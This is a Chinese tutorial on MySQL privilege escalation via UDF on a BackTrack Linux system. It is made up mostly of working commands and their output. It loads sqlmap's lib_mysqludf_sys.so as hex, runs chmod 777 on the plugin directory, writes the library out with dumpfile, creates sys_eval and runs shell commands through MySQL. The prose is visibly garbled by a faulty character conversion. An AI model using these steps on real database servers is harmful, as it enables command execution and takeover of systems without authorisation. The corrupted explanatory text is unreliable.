Linux應用UDF庫完成Mysql提權。本站提示廣大學習愛好者:(Linux應用UDF庫完成Mysql提權)文章只能為提供參考,不一定能成為您想要的結果。以下是Linux應用UDF庫完成Mysql提權正文
情況:
os:linux(bt5)
database:mysql
簡述:
經由過程自界說庫函數來完成履行隨意率性的法式,這裡只在linux下測試經由過程,詳細到windows,所用的dll天然分歧。
請求:
在mysql庫下必需有func表,而且在‑‑skip‑grant‑tables開啟的情形下,UDF會被制止;
進程: 獲得插件庫途徑 找對應操作體系的udf庫文件 應用udf庫文件加載函數並履行敕令
1,獲得插件庫途徑
mysql> show variables like "%plugin%"; +---------------+-----------------------+ | Variable_name | Value | +---------------+-----------------------+ | plugin_dir | /usr/lib/mysql/plugin | +---------------+-----------------------+ 1 row in set (0.00 sec)
2,找對應操作體系的udf庫文件
由於本身測試,看了下本身體系的版本,64位
root@bt:~# uname -a Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
關於udf文件,在sqlmap對象中自帶就有,只需找對應操作體系的版本便可
root@bt:/pentest/database/sqlmap/udf/mysql# ls linux windows root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls 32 64 root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls lib_mysqludf_sys.so
3,應用udf庫文件加載函數並履行敕令
起首要獲得udf庫文件的十六進制格局,可在當地經由過程
mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)
由於我測試時,應用自帶賬戶,賬戶名mysql,其實不是root,所以插件目次弗成寫,而現實中,普通udf提權都是用root權限啟動的mysql法式,故,不存在目次權限缺乏,不克不及拜訪的情形。為了持續,修正目次權限
root@bt:~# chmod 777 /usr/lib/mysql/plugin
數據庫中寫入udf庫到mysql庫目次:
mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)
檢查下這個udf庫所支撐的函數
root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
w _Jv_RegisterClasses
0000000000201788 A __bss_start
w __cxa_finalize
w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
U fgets
U fork
U free
U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
U malloc
U mmap
U pclose
U popen
U realloc
U setenv
U strcpy
U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
U sysconf
U system
U waitpid
最初,加載函數並履行:
mysql> create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql |
+--------------------+
1 row in set (0.04 sec)
mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name | ret | dl | type |
+----------+-----+-------------+----------+
| sys_eval | 0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set
